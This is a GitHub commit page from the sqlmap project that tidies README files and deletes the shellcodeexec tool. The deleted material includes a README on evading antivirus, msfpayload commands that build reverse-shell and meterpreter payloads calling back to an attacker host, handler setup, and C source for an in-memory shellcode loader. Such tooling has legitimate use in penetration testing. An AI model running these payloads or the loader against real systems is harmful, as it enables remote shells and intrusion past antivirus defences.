Permalink
Browse files

cleanup to README files

  • Loading branch information...
1 parent 7198e31 commit 224e6376a64084d5fcc61e829b1f43bd3bce343f @inquisb inquisb committed Jul 16, 2012
@@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible
The master is straight forward to use. There are no extra libraries required for the C version.
The Perl master however has the following dependencies:
- * IO::Socket
- * NetPacket::IP
- * NetPacket::ICMP
+ * IO::Socket
+ * NetPacket::IP
+ * NetPacket::ICMP
When running the master, don't forget to disable ICMP replies by the OS. For example:
- sysctl -w net.ipv4.icmp_echo_ignore_all=1
+ sysctl -w net.ipv4.icmp_echo_ignore_all=1
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
commands send from the master.
@@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below:
-t host host ip address to send ping requests to. This option is mandatory!
-r send a single test icmp request containing the string "Test1234" and then quit.
- This is for testing the connection.
+ This is for testing the connection.
-d milliseconds delay between requests in milliseconds
-o milliseconds timeout of responses in milliseconds. If a response has not received in time,
- the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
+ the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
The counter is set back to 0 if a response was received.
-b num limit of blanks (unanswered icmp requests before quitting
@@ -1,7 +1,3 @@
Files in this folder can be used to compile auxiliary program that can
be used for running command prompt commands skipping standard "cmd /c" way.
-They are licensed under the terms of the GNU Lesser General Public License
-and it's compiled version is available on the official sqlmap subversion
-repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
+They are licensed under the terms of the GNU Lesser General Public License.
@@ -1,126 +0,0 @@
-= Short description =
-
-shellcodeexec is a small script to execute in memory a sequence of opcodes.
-
-
-= Background =
-
-Most of the shellcode launchers out there, including proof of concepts
-part of many "security" books, detail how to allocate a memory page as
-readable/writable/executable on POSIX systems, copy over your shellcode
-and execute it. This works just fine. However, it is limited to POSIX,
-does not necessarily consider 64-bit architecture and Windows systems.
-
-
-= Description =
-
-This script and the relevant project files (Makefile and Visual Studio
-files) allow you to compile the tool once then run your shellcode across
-different architectures and operating systems.
-
-Moreover, it solves a common real world issue: the target system's anti
-virus software blocking a Metasploit-generated payload stager (either EXE
-of ELF). Take for instance the following command line:
-
- $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
-
-This generates a Metasploit payload stager, payload.exe, that as soon as
-it lands on the AV-protected target system is recognized as malicious and
-potentially blocked (depending on the on-access scan settings) by many
-anti virus products. At the time of writing this text, 21 out 41 anti
-viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
-multiple times with msfencode, less AV softwares detect it, still a lot.
-
-I have been surfing the Net and found some interesting tutorials and
-guides about packing, compressing, obfuscating and applying IDA-foo to
-portable executables et similar in order to narrow down the number of AV
-products that can detect it as a malicious file. This is all interesting,
-but does not stop few hard-to-die anti viruses to detect your backdoor.
-
-So the question is, how cool would it be to have a final solution to avoid
-all this hassle? This is exactly where this tool comes into play!
-
-
-= Features =
-
-shellcodeexec:
-
-* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
-
-* Can be compiled and works on 32-bit and 64-bit architectures.
-
-* As far as I know, no AV detect it as malicious.
-
-* Works in DEP/NX-enabled environments: it allocates the memory page where
- it stores the shellcode as +rwx - Readable Writable and eXecutable.
-
-* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
- shellcode (generated for instance with Metasploit's msfpayload) to
- Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
- BufferRegister variable to EAX registry where the address in memory of
- the shellcode will be stored, to avoid get_pc() binary stub to be
- prepended to the shellcode.
-
-* Spawns a new thread where the shellcode is executed in a structure
- exception handler (SEH) so that if you wrap shellcodeexec into your own
- executable, it avoids the whole process to crash in case of unexpected
- behaviours.
-
-
-= HowTo =
-
-1. Generate a Metasploit shellcode and encode it with the alphanumeric
- encoder. For example for a Linux target:
-
- $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-
- Or for a Windows target:
-
- $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-
-
-2. Execute the Metasploit multi/handler listener on your machine. For
- example for a Linux target:
-
- $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
-
- Or for a Windows target:
-
- $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
-
-
-3. Execute the alphanumeric-encoded shellcode with this tool. For example
- on the Linux target:
-
- $ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
-
- Or, on the Windows target:
-
- C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
-
-
-= License =
-
-This source code is free software; you can redistribute it and/or
-modify it under the terms of the GNU Lesser General Public
-License as published by the Free Software Foundation; either
-version 2.1 of the License, or (at your option) any later version.
-
-This library is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-Lesser General Public License for more details.
-
-You should have received a copy of the GNU Lesser General Public
-License along with this library; if not, write to the Free Software
-Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
-
-
-= Author =
-
-Bernardo Damele A. G. <bernardo.damele@gmail.com>
-
-
-= Homepage =
-
-https://github.com/inquisb/shellcodeexec
@@ -0,0 +1,4 @@
+Binary files in this folder are data files used by sqlmap on the target
+system, but not executed on the system running sqlmap. They are licensed
+under the terms of the GNU Lesser General Public License and their source
+code is available on https://github.com/inquisb/shellcodeexec.
@@ -1,7 +0,0 @@
-32:
- gcc -Wall -Os shellcodeexec.c -o shellcodeexec
- strip -sx shellcodeexec
-
-64:
- gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
- strip -sx shellcodeexec
@@ -1,138 +0,0 @@
-/*
- shellcodeexec - Script to execute in memory a sequence of opcodes
- Copyright (C) 2011 Bernardo Damele A. G.
- web: http://bernardodamele.blogspot.com
- email: bernardo.damele@gmail.com
-
- This source code is free software; you can redistribute it and/or
- modify it under the terms of the GNU Lesser General Public
- License as published by the Free Software Foundation; either
- version 2.1 of the License, or (at your option) any later version.
-
- This library is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- Lesser General Public License for more details.
-
- You should have received a copy of the GNU Lesser General Public
- License along with this library; if not, write to the Free Software
- Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
-*/
-
-#include <sys/types.h>
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#include <windows.h>
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#else
-#include <sys/mman.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-int sys_bineval(char *argv);
-
-int main(int argc, char *argv[])
-{
- if (argc < 2) {
- printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
- exit(-1);
- }
-
- sys_bineval(argv[1]);
-
- exit(0);
-}
-
-int sys_bineval(char *argv)
-{
- size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- int pID;
- char *code;
-#else
- int *addr;
- size_t page_size;
- pid_t pID;
-#endif
-
- len = (size_t)strlen(argv);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- // allocate a +rwx memory page
- code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
- // copy over the shellcode
- strncpy(code, argv, len);
-
- // execute it by ASM code defined in exec_payload function
- WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
- pID = fork();
- if(pID<0)
- return 1;
-
- if(pID==0)
- {
- page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
- page_size = (len+page_size) & ~(page_size); // align to page boundary
-
- // mmap an +rwx memory page
- addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
-
- if (addr == MAP_FAILED)
- return 1;
-
- // copy over the shellcode
- strncpy((char *)addr, argv, len);
-
- // execute it
- ((void (*)(void))addr)();
- }
-
- if(pID>0)
- waitpid(pID, 0, WNOHANG);
-#endif
-
- return 0;
-}
-
-#if defined(_WIN64)
-void __exec_payload(LPVOID);
-
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __exec_payload(lpParameter);
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __asm
- {
- mov eax, [lpParameter]
- call eax
- }
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#endif
@@ -1,25 +0,0 @@
-Before compiling, an enviroment variable has to be set.
-
---------------------------------------------------------------------------
-Variable name Variable description
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR Directory where the Platform SDK is installed
-
-
-Procedure for setting environment variables on Windows:
-My Computer -> Properties -> Advanced -> Environment Variables
-User variables -> New
-
-
-Sample value:
---------------------------------------------------------------------------
-Variable name Variable value
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
-
-
-Notes:
-
-To get as small portable executable as possible compile as follows:
-* Use Visual C++ 2005
-* Strip the executable with UPX
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 9.00
-# Visual C++ Express 2005
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcodeexec", "shellcodeexec\shellcodeexec.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
Oops, something went wrong.

0 comments on commit 224e637

Please sign in to comment.